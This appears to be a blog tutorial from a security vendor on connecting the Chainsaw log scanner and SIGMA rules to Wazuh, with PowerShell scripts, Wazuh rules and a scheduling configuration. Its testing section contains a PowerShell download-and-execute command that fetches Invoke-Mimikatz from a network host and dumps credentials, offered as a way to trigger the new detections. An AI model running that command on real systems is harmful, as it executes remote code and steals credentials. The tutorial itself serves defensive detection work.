Wazuh and Chainsaw integration for near real time SIGMA detection

Integrate Wazuh and Chainsaw to integrate SIGMA rules with your Wazuh stack

Walkthrough Video

Intro

In today’s world, it’s more important than ever to have effective threat detection mechanisms in place. Wazuh provides a wealth of detection rules out of the box, however there has yet to be (at least in my experience) an easy way to integrate SIGMA rules with Wazuh in an automated manner.

The biggest challenge we face is converting SIGMA’s more expressive rule logic to the less expressive Wazuh logic. For example, Wazuh only supports OR conditions within a single field statement, not between them. Only AND logic is supported between two or more field statements in a Wazuh rule. Therefore if OR logic is required between two field statements, we have to create two Wazuh rules.

However, what if we could integrate Wazuh with a tool that is capable of handling the more expressive SIGMA logic?

Hello Chainsaw

Chainsaw, developed by WithSecureLabs, gives us just that! Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artifacts such as Event Logs and MFTs. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

Features

• 🎯 Hunt for threats using Sigma detection rules and custom Chainsaw detection rules
• 🔍 Search and extract forensic artefacts by string matching, and regex patterns
• ⚡ Lightning fast, written in rust, wrapping the EVTX parser library by @OBenamram
• 🧹 Clean and lightweight execution and output formats without unnecessary bloat
• 🔥 Document tagging (detection logic matching) provided by the TAU Engine Library
• 📑 Output results in a variety of formats, such as ASCII table format, CSV format, and JSON format
• 💻 Can be run on MacOS, Linux and Windows

In this post we will detail how you can integrate Chainsaw with your endpoints and configure Wazuh to collect Chainsaw detections.

Installation

Let’s install Chainsaw and download the SIGMA repo to our Windows endpoint.

Install Chainsaw and SIGMA Rules

Let’s first download the Chainsaw binary onto all of our endpoints where we have also deployed a Wazuh-Agent. In this example, I am going to deploy on a Windows host.

1. https://github.com/WithSecureLabs/chainsaw/releases

Chainsaw Releases

2. Extract the .zip to the folder of your choice. I extracted mine to C:\Program Files\socfortress\chainsaw

Chainsaw Extraction

3. Download the SIGMA repo and store in same folder of the extracted Chainsaw package.

• I like to use Git so I can update the SIGMA rules every time I run Chainsaw

I use the below Powershell script to download Git and the Sigma repo:

# Download the specified version of Git for Windows
$downloadLink = "https://github.com/git-for-windows/git/releases/download/v2.40.0.windows.1/Git-2.40.0-64-bit.exe"
$gitInstaller = "git-latest-windows.exe"
Invoke-WebRequest -Uri $downloadLink -OutFile $gitInstaller

# Install Git
Start-Process -FilePath $gitInstaller -ArgumentList "/VERYSILENT", "/NORESTART", "/LOG=git_install.log" -NoNewWindow -Wait

# Remove the installer
Remove-Item -Path $gitInstaller

# Add Git to the system PATH
$gitBinPath = "${env:ProgramFiles}\Git\cmd"
$env:Path += ";$gitBinPath"
$env:Path = [System.Environment]::GetEnvironmentVariable("Path", "Machine") + ";$gitBinPath"
[Environment]::SetEnvironmentVariable("Path", $env:Path, "Machine")

# Download the SIGMA repository
$repoUrl = "https://github.com/SigmaHQ/sigma.git"
$destinationFolder = "C:\Program Files\socfortress\chainsaw\sigma"
git clone $repoUrl $destinationFolder

*Note: Change the $destinationFolder to the path of your choice**

Testing

We can quickly test Chainsaw by downloading the EVTX-ATTACK-SAMPLES repo.

"C:\Program Files\Git\bin\git.exe" clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git

Download EVTX-ATTACK-SAMPLES

Run Chainsaw

chainsaw.exe hunt EVTX-ATTACK-SAMPLES/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml

Running Chainsaw

Integrating With Wazuh

We have now installed Chainsaw and SIGMA detection rules onto our endpoint. Now we need an optimal solution to get detected events to the Wazuh-Manager. Since our Wazuh-Agent is currently forwarding all logs written within the active-response.log file, this is a perfect file for us to output our Chainsaw results to!

Powershell Script

The below Powershell script (chainsaw.ps1) will:

1. Updates SIGMA rules if required
2. Runs Chainsaw against our Windows Event, Sysmon, and Powershell logs
3. Converts the results to JSON and outputs to C:\Program Files (x86)\ossec-agent\active-response\active-responses.log

################################
### Script to execute Chainsaw - Identify Malicious activity recorded in WinEvtLogs using Sigma Rules
### SOCFortress LLP - info@socfortress.co
################################

##########
# Chainsaw will be run against all event logs found in the default location
# Output converted to JSON and appended to active-responses.log
##########

##########
# Chainsaw Version: v2.5.0
##########

$ErrorActionPreference = "SilentlyContinue"

# Clone or pull Sigma repo
$repo_path = "C:\Program Files\socfortress\chainsaw\sigma"
if (!(test-path $repo_path)) {
    New-Item -ItemType Directory -Force -Path $repo_path
    $env:PATH += ";C:\Program Files\Git\bin"
    git clone https://github.com/SigmaHQ/sigma.git $repo_path
} else {
    $env:PATH += ";C:\Program Files\Git\bin"
    git -C $repo_path pull
}

# Analyse events recorded in last 5 Minutes. Convert Start Date to Timestamp
$start_date = (Get-Date).AddMinutes(-5)
$from = Get-Date -Date $start_date -UFormat '+%Y-%m-%dT%H:%M:%S'

# Create Chainsaw Output Folder if it doesn't exist
$chainsaw_output = "$env:TMP\chainsaw_output"
If(!(test-path $chainsaw_output)) {
    New-Item -ItemType Directory -Force -Path $chainsaw_output
}

# Windows Sigma Path
$windows_path = "C:\Program Files\socfortress\chainsaw\sigma\rules\windows"

# Run Chainsaw and store JSONs in TMP folder
& 'C:\Program Files\socfortress\chainsaw\chainsaw.exe' hunt C:\Windows\System32\winevt -s $windows_path --mapping 'C:\Program Files\socfortress\chainsaw\mappings\sigma-event-logs-all.yml' --from $from --output $env:TMP\chainsaw_output\results.json --json --level high --level critical

# Convert JSON to new line entry for every 'group'
function Convert-JsonToNewLine($json) {
    foreach($document in $json) {
        $document.document | ConvertTo-Json -Compress -Depth 99 | foreach-object {
            [pscustomobject]@{
                group = $document.group
                kind = $document.kind
                document = $_
                event = $document.document.data.Event.EventData
                path = $document.document.path
                system = $document.document.data.Event.System
                name = $document.name
                timestamp = $document.timestamp
                authors = $document.authors
                level = $document.level
                source = $document.source
                status = $document.status
                falsepositives = $document.falsepositives
                id = $document.id
                logsource = $document.logsource
                references = $document.references
                tags = $document.tags
            } | ConvertTo-Json -Compress
        }
    }
}

# Define the file path
$file = "C:\Program Files (x86)\ossec-agent\active-response\active-responses.log"

# Convert JSONs to new line entry and append to active-responses.log
Get-ChildItem $env:TMP\chainsaw_output -Filter *.json | Foreach-Object {
    $Chainsaw_Array = Get-Content $_.FullName | ConvertFrom-Json
    Convert-JsonToNewLine $Chainsaw_Array | Out-File -Append -Encoding ascii $file
}

# Remove TMP JSON Folder
rm -r $env:TMP\chainsaw_output

# Output status if Sigma rules were updated
if ($LASTEXITCODE -eq 0) {
    $status_payload = @{
        group = 'Sigma'
        status = 'success'
        message = 'Sigma rules were updated successfully.'
    } | ConvertTo-Json -Compress
    Write-Output $status_payload

    # Append the payload to the log file
    $status_payload | Out-File -Append -Encoding ascii $file
}
else {
    $error_payload = @{
        group = 'Sigma'
        status = 'failure'
        message = 'Failed to update Sigma rules.'
    } | ConvertTo-Json -Compress
    Write-Output $error_payload

    # Append the payload to the log file
    $error_payload | Out-File -Append -Encoding ascii $file
}

** The script above is set to run against the latest 5 minutes of logs and only loads high and critical Windows SIGMA rules for analysis**

Wazuh Rules

Add the below Wazuh rules to your Wazuh manager to detect SIGMA alerts.

200050-chainsaw_sigma_rules.xml

<group name="windows,chainsaw,">
 <rule id="200050" level="3">
    <field name="group">^Sigma$</field>
    <description>Chainsaw Forensics - Sigma Scan</description>
    <group>sigma,</group>
    <options>no_full_log</options>
  </rule>
  <rule id="200051" level="12">
    <if_sid>200050</if_sid>
    <field name="level">high</field>
    <description>$(name)</description>
    <group>sigma,</group>
    <options>no_full_log</options>
  </rule>
  <rule id="200052" level="1">
    <if_sid>200051</if_sid>
    <field name="logsource.category">^driver_load$</field>
    <description>Exclude high driver loads due to FPs</description>
    <group>sigma,</group>
    <options>no_full_log</options>
  </rule>
  <rule id="200053" level="14">
    <if_sid>200050</if_sid>
    <field name="level">critical</field>
    <description>$(name)</description>
    <group>sigma,</group>
    <options>no_full_log</options>
  </rule>
 <rule id="200054" level="1">
    <if_sid>200050</if_sid>
    <field name="message">^Sigma rules were updated successfully.$</field>
    <description>$(message)</description>
    <group>sigma,</group>
    <options>no_full_log</options>
  </rule>
  <rule id="200055" level="13">
    <if_sid>200050</if_sid>
    <field name="message">^Failed to update Sigma rules.$</field>
    <description>$(message)</description>
    <group>sigma,</group>
    <options>no_full_log</options>
  </rule>
 </group>

Automating

Let’s enable Chainsaw scanning of our Windows endpoints via a Wazuh Wodle. The below Wodle will instruct Wazuh to call our chainsaw.ps1 on our Windows endpoints every 5 minutes.

<wodle name="command">
  <disabled>no</disabled>
  <tag>windows_chainsaw</tag>
  <command>Powershell.exe -executionpolicy bypass -File "C:\Program Files (x86)\ossec-agent\active-response\bin\chainsaw.ps1"</command>
  <interval>5m</interval>
  <ignore_output>yes</ignore_output>
  <run_on_start>yes</run_on_start>
  <timeout>0</timeout>
 </wodle>

Testing

Trigger some detections by simulating downloading and running Mimikatz.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Now when Wazuh runs the Wodle, we will see the below alerts.

Conclusion

Integrating Chainsaw with Wazuh can be a powerful solution to overcome the logic constraints of Wazuh rules when it comes to integrating with Sigma rules. By leveraging Chainsaw’s powerful log analysis capabilities, organizations can gain greater visibility into their systems and networks, detect potential threats more quickly, and respond more effectively to security incidents. While the process of integrating these two tools may require some technical expertise, the benefits of doing so can be well worth the effort. By taking a proactive approach to security monitoring, organizations can better protect themselves against cyber threats and safeguard their valuable data and assets.

Need Help?

The functionality discussed in this post, and so much more, are available via the SOCFortress platform. Let SOCFortress help you and your team keep your infrastructure secure.

Website: https://www.socfortress.co/

Contact Us: https://www.socfortress.co/contact_form.html